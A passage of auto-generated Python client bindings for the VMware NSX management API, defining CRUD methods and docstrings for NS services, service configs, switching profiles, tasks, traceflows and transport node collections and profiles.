:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.ConcurrentChange`
Conflict
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'ns_service_group_id': ns_service_group_id,
'ns_service_group': ns_service_group,
})
class NsServices(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.ns_services'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _NsServicesStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
ns_service,
):
"""
Creates a new NSService which allows users to specify characteristics
to use for matching network traffic.
:type ns_service: :class:`com.vmware.nsx.model_client.NSService`
:param ns_service: (required)
:rtype: :class:`com.vmware.nsx.model_client.NSService`
:return: com.vmware.nsx.model.NSService
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'ns_service': ns_service,
})
def delete(self,
ns_service_id,
force=None,
):
"""
Deletes the specified NSService. By default, if the NSService is being
referred in an NSServiceGroup, it can't be deleted. In such situations,
pass \"force=true\" as a parameter to force delete the NSService.
System defined NSServices can't be deleted using \"force\" flag.
:type ns_service_id: :class:`str`
:param ns_service_id: NSService Id (required)
:type force: :class:`bool` or ``None``
:param force: Force delete the resource even if it is being used somewhere
(optional, default to false)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.ConcurrentChange`
Conflict
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'ns_service_id': ns_service_id,
'force': force,
})
def get(self,
ns_service_id,
):
"""
Returns information about the specified NSService
:type ns_service_id: :class:`str`
:param ns_service_id: NSService Id (required)
:rtype: :class:`com.vmware.nsx.model_client.NSService`
:return: com.vmware.nsx.model.NSService
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'ns_service_id': ns_service_id,
})
def list(self,
cursor=None,
default_service=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns paginated list of NSServices
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type default_service: :class:`bool` or ``None``
:param default_service: Fetch all default NSServices (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.NSServiceListResult`
:return: com.vmware.nsx.model.NSServiceListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'default_service': default_service,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def update(self,
ns_service_id,
ns_service,
):
"""
Updates the specified NSService. Modifiable parameters include the
description, display_name and the NSService element. The system defined
NSServices can't be modified
:type ns_service_id: :class:`str`
:param ns_service_id: NSService Id (required)
:type ns_service: :class:`com.vmware.nsx.model_client.NSService`
:param ns_service: (required)
:rtype: :class:`com.vmware.nsx.model_client.NSService`
:return: com.vmware.nsx.model.NSService
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.ConcurrentChange`
Conflict
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'ns_service_id': ns_service_id,
'ns_service': ns_service,
})
class ServiceConfigs(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.service_configs'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ServiceConfigsStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
service_config,
):
"""
Creates a new service config that can group profiles and configs
:type service_config: :class:`com.vmware.nsx.model_client.ServiceConfig`
:param service_config: (required)
:rtype: :class:`com.vmware.nsx.model_client.ServiceConfig`
:return: com.vmware.nsx.model.ServiceConfig
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'service_config': service_config,
})
def delete(self,
config_set_id,
):
"""
Deletes the specified service config
:type config_set_id: :class:`str`
:param config_set_id: service Ccnfig Id (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'config_set_id': config_set_id,
})
def get(self,
config_set_id,
):
"""
Returns information about the specified Service Config.
:type config_set_id: :class:`str`
:param config_set_id: Service Config Id (required)
:rtype: :class:`com.vmware.nsx.model_client.ServiceConfig`
:return: com.vmware.nsx.model.ServiceConfig
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'config_set_id': config_set_id,
})
def list(self,
cursor=None,
included_fields=None,
page_size=None,
profile_type=None,
sort_ascending=None,
sort_by=None,
):
"""
List of all service configs.
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type profile_type: :class:`str` or ``None``
:param profile_type: Fetch ServiceConfig for the given attribute profile_type (optional)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.ServiceConfigListResult`
:return: com.vmware.nsx.model.ServiceConfigListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'profile_type': profile_type,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def update(self,
config_set_id,
service_config,
):
"""
Updates the specified ServiceConfig.
:type config_set_id: :class:`str`
:param config_set_id: service config Id (required)
:type service_config: :class:`com.vmware.nsx.model_client.ServiceConfig`
:param service_config: (required)
:rtype: :class:`com.vmware.nsx.model_client.ServiceConfig`
:return: com.vmware.nsx.model.ServiceConfig
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'config_set_id': config_set_id,
'service_config': service_config,
})
class SwitchingProfiles(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.switching_profiles'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _SwitchingProfilesStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
base_switching_profile,
):
"""
Creates a new, custom qos, port-mirroring, spoof-guard or port-security
switching profile. You can override their default switching profile
assignments by creating a new switching profile and assigning it to one
or more logical switches. You cannot override the default ipfix or
ip_discovery switching profiles.
:type base_switching_profile: :class:`vmware.vapi.struct.VapiStruct`
:param base_switching_profile: (required)
The parameter must contain all the attributes defined in
:class:`com.vmware.nsx.model_client.BaseSwitchingProfile`.
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.BaseSwitchingProfile
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.BaseSwitchingProfile`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'base_switching_profile': base_switching_profile,
})
def delete(self,
switching_profile_id,
unbind=None,
):
"""
Deletes the specified switching profile.
:type switching_profile_id: :class:`str`
:param switching_profile_id: (required)
:type unbind: :class:`bool` or ``None``
:param unbind: force unbinding of logical switches and ports from a switching
profile (optional, default to false)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'switching_profile_id': switching_profile_id,
'unbind': unbind,
})
def get(self,
switching_profile_id,
):
"""
Returns information about a specified switching profile.
:type switching_profile_id: :class:`str`
:param switching_profile_id: (required)
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.BaseSwitchingProfile
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.BaseSwitchingProfile`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'switching_profile_id': switching_profile_id,
})
def list(self,
cursor=None,
include_system_owned=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
switching_profile_type=None,
):
"""
Returns information about the system-default and user-configured
switching profiles. Each switching profile has a unique ID, a display
name, and various other read-only and configurable properties. The
default switching profiles are assigned automatically to each switch.
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type include_system_owned: :class:`bool` or ``None``
:param include_system_owned: Whether the list result contains system resources (optional,
default to false)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:type switching_profile_type: :class:`str` or ``None``
:param switching_profile_type: comma-separated list of switching profile types, e.g.
?switching_profile_type=QosSwitchingProfile,IpDiscoverySwitchingProfile
(optional)
:rtype: :class:`com.vmware.nsx.model_client.SwitchingProfilesListResult`
:return: com.vmware.nsx.model.SwitchingProfilesListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'include_system_owned': include_system_owned,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
'switching_profile_type': switching_profile_type,
})
def update(self,
switching_profile_id,
base_switching_profile,
):
"""
Updates the user-configurable parameters of a switching profile. Only
the qos, port-mirroring, spoof-guard and port-security switching
profiles can be modified. You cannot modify the ipfix or ip-discovery
switching profiles.
:type switching_profile_id: :class:`str`
:param switching_profile_id: (required)
:type base_switching_profile: :class:`vmware.vapi.struct.VapiStruct`
:param base_switching_profile: (required)
The parameter must contain all the attributes defined in
:class:`com.vmware.nsx.model_client.BaseSwitchingProfile`.
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.BaseSwitchingProfile
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.BaseSwitchingProfile`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'switching_profile_id': switching_profile_id,
'base_switching_profile': base_switching_profile,
})
class Tasks(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.tasks'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _TasksStub)
self._VAPI_OPERATION_IDS = {}
def get(self,
task_id,
):
"""
Get information about the specified task
:type task_id: :class:`str`
:param task_id: ID of task to read (required)
:rtype: :class:`com.vmware.nsx.model_client.TaskProperties`
:return: com.vmware.nsx.model.TaskProperties
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'task_id': task_id,
})
def list(self,
cursor=None,
included_fields=None,
page_size=None,
request_uri=None,
sort_ascending=None,
sort_by=None,
status=None,
user=None,
):
"""
Get information about all tasks
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type request_uri: :class:`str` or ``None``
:param request_uri: Request URI(s) to include in query result (optional)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:type status: :class:`str` or ``None``
:param status: Status(es) to include in query result (optional)
:type user: :class:`str` or ``None``
:param user: Names of users to include in query result (optional)
:rtype: :class:`com.vmware.nsx.model_client.TaskListResult`
:return: com.vmware.nsx.model.TaskListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'request_uri': request_uri,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
'status': status,
'user': user,
})
class Traceflows(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.traceflows'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _TraceflowsStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
traceflow_request,
):
"""
Initiate a Traceflow Operation on the Specified Port
:type traceflow_request: :class:`com.vmware.nsx.model_client.TraceflowRequest`
:param traceflow_request: (required)
:rtype: :class:`com.vmware.nsx.model_client.Traceflow`
:return: com.vmware.nsx.model.Traceflow
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'traceflow_request': traceflow_request,
})
def delete(self,
traceflow_id,
):
"""
Delete the Traceflow round
:type traceflow_id: :class:`str`
:param traceflow_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'traceflow_id': traceflow_id,
})
def get(self,
traceflow_id,
):
"""
Get the Traceflow round status and result summary
:type traceflow_id: :class:`str`
:param traceflow_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.Traceflow`
:return: com.vmware.nsx.model.Traceflow
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'traceflow_id': traceflow_id,
})
def list(self,
cursor=None,
included_fields=None,
lport_id=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
List all Traceflow rounds; if a logical port id is given as a query
parameter, only those originated from the logical port are returned.
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type lport_id: :class:`str` or ``None``
:param lport_id: id of the source logical port where the trace flows originated
(optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.TraceflowListResult`
:return: com.vmware.nsx.model.TraceflowListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'included_fields': included_fields,
'lport_id': lport_id,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
class TransportNodeCollections(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.transport_node_collections'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _TransportNodeCollectionsStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
transport_node_collection,
):
"""
When transport node collection is created the hosts which are part of
compute collection will be prepared automatically i.e. NSX Manager
attempts to install the NSX components on hosts. Transport nodes for
these hosts are created using the configuration specified in transport
node profile.
:type transport_node_collection: :class:`com.vmware.nsx.model_client.TransportNodeCollection`
:param transport_node_collection: (required)
:rtype: :class:`com.vmware.nsx.model_client.TransportNodeCollection`
:return: com.vmware.nsx.model.TransportNodeCollection
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'transport_node_collection': transport_node_collection,
})
def delete(self,
transport_node_collection_id,
):
"""
By deleting transport node collection, we are detaching the transport
node profile(TNP) from the compute collection. It has no effect on
existing transport nodes. However, new hosts added to the compute
collection will no longer be automatically converted to NSX transport
node. Detaching TNP from compute collection does not delete TNP.
:type transport_node_collection_id: :class:`str`
:param transport_node_collection_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'transport_node_collection_id': transport_node_collection_id,
})
def get(self,
transport_node_collection_id,
):
"""
Returns transport node collection by id
:type transport_node_collection_id: :class:`str`
:param transport_node_collection_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.TransportNodeCollection`
:return: com.vmware.nsx.model.TransportNodeCollection
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'transport_node_collection_id': transport_node_collection_id,
})
def list(self):
"""
Returns all Transport Node collections
:rtype: :class:`com.vmware.nsx.model_client.TransportNodeCollectionListResult`
:return: com.vmware.nsx.model.TransportNodeCollectionListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list', None)
def update(self,
transport_node_collection_id,
transport_node_collection,
):
"""
Attach different transport node profile to compute collection by
updating transport node collection.
:type transport_node_collection_id: :class:`str`
:param transport_node_collection_id: (required)
:type transport_node_collection: :class:`com.vmware.nsx.model_client.TransportNodeCollection`
:param transport_node_collection: (required)
:rtype: :class:`com.vmware.nsx.model_client.TransportNodeCollection`
:return: com.vmware.nsx.model.TransportNodeCollection
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'transport_node_collection_id': transport_node_collection_id,
'transport_node_collection': transport_node_collection,
})
class TransportNodeProfiles(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.transport_node_profiles'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _TransportNodeProfilesStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
transport_node_profile,
):
"""
Transport node profile captures the configuration needed to create a
transport node. A transport node profile can be attached to compute
collections for automatic TN creation of member hosts.
:type transport_node_profile: :class:`com.vmware.nsx.model_client.TransportNodeProfile`
:param transport_node_profile: (required)
:rtype: :class:`com.vmware.nsx.model_client.TransportNodeProfile`
:return: com.vmware.nsx.model.TransportNodeProfile
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'transport_node_profile': transport_node_profile,
})
def delete(self,
transport_node_profile_id,
):
"""
Deletes the specified transport node profile. A transport node profile
can be deleted only when it is not attached to any compute collection.
:type transport_node_profile_id: :class:`str`
:param transport_node_profile_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'transport_node_profile_id': transport_node_profile_id,
})
def get(self,
transport_node_profile_id,
):
"""
Returns information about a specified transport node profile.
:type transport_node_profile_id: :class:`str`
:param transport_node_profile_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.TransportNodeProfile`
:return: com.vmware.nsx.model.TransportNodeProfile
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
